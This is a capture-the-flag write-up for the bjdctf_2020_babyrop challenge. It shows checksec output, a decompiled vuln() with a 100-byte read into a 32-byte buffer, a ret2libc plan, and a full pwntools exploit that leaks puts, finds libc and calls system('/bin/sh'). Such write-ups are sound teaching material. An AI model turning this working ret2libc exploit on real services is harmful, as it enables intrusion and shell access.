
bjdctf_2020_babyrop

Ubuntu 16


0x01


checksec

[*] '/home/zelas/Desktop/pwn/bjdctf_2020_babyrop/bjdctf_2020_babyrop'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled //栈不可执行
PIE: No PIE (0x400000)

IDA

vuln()

// Decompiler (IDA) listing of vuln() from the challenge binary.
// read() accepts up to 0x64 (100) bytes into a 32-byte stack buffer with no
// length check, so input beyond 32 bytes overwrites the saved rbp and the
// return address; the checksec output on this page shows no stack canary, so
// the overwrite is not detected. Bounding the read to sizeof(buf) or building
// with the stack protector would have closed this.
ssize_t vuln()
{
char buf[32]; // [rsp+0h] [rbp-20h] BYREF

puts("Pull up your sword and tell me u story!");
return read(0, buf, 0x64uLL); // stack overflow: 0x64 bytes read into a 32-byte buffer
}

0x02


思路 ret2libc x64

1.利用read()函数溢出 泄露puts()地址

2.利用LibcSearcher计算出system()和bin_sh

3.再次执行main(),read()溢出至system()

s 0x20H
rbp 0x8
pop_rdi_ret puts_got
ret puts()
puts_ret main()
s 0x20H
rbp 0x8
pop_rdi_ret bin_sh
ret system()

0x03


exp

libc6_2.23-0ubuntu10_amd64

# Proof-of-concept from the writeup for the bjdctf_2020_babyrop challenge binary.
# Why it works (see the checksec output and the vuln() listing on this page):
# vuln() read()s 0x64 bytes into a 32-byte stack buffer and there is no stack
# canary; NX rules out running code from the stack (hence ret2libc); No PIE keeps
# the binary's PLT/GOT/gadget addresses fixed. A stack protector, PIE, or a read
# bounded to sizeof(buf) would each have broken one of these assumptions.
from pwn import *
from LibcSearcher import *

# pwntools context: 64-bit Linux target; debug log level echoes every byte sent/received.
context(os='linux', arch='amd64', log_level='debug')
# io = remote('node4.buuoj.cn', 28466)
# Runs the binary locally; the commented-out line above targets the challenge server instead.
io = process(['./bjdctf_2020_babyrop'])
elf = ELF('./bjdctf_2020_babyrop')

# 32-byte buf plus the 8-byte saved rbp; the next 8 bytes written land on the return address.
padding: int = 0x20 + 0x8
# Binary-local addresses; stable only because the binary is not PIE.
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main_addr = elf.symbols['main']
# Address of the 'pop rdi; ret' gadget in the binary (value taken from the writeup, not derived here).
pop_rdi_ret: int = 0x400733
# Stage 1 chain: call puts(puts@got) to leak the libc address of puts, then return to
# main so vuln() runs a second time.
payload = b'a' * padding + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
# Tail of the prompt printed by vuln(); the variable name is misspelled but kept as-is.
delimeter = b'story!\n'
io.sendlineafter(delimeter, payload)

# The leak is read as 6 bytes (a user-space x86-64 address) and zero-padded to 8 for u64.
puts_addr = io.recv(6).ljust(8,b'\x00')
puts_addr = u64(puts_addr)
# Blocks until the user continues (e.g. to attach a debugger before the second stage).
pause()
print('[+] puts_addr', hex(puts_addr))

# Identify the libc build from the leaked puts address and derive the base;
# the writeup states the matching build was libc6_2.23-0ubuntu10_amd64.
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
bin_sh = libc_base + libc.dump('str_bin_sh')

print('[+] libc_base', hex(libc_base))
print('[+] system', hex(system))
print('[+] bin_sh', hex(bin_sh))
# NOTE(review): assigned but never used; it is not part of either payload.
ret: int = 0x4004c9
# Stage 2 chain: system("/bin/sh") through the same pop rdi gadget, using the libc
# addresses computed above.
payload1 = b'a' * padding + p64(pop_rdi_ret) + p64(bin_sh) + p64(system)
# Sent to the re-run of main() without waiting for the prompt (no sendlineafter here).
io.sendline(payload1)
io.interactive()

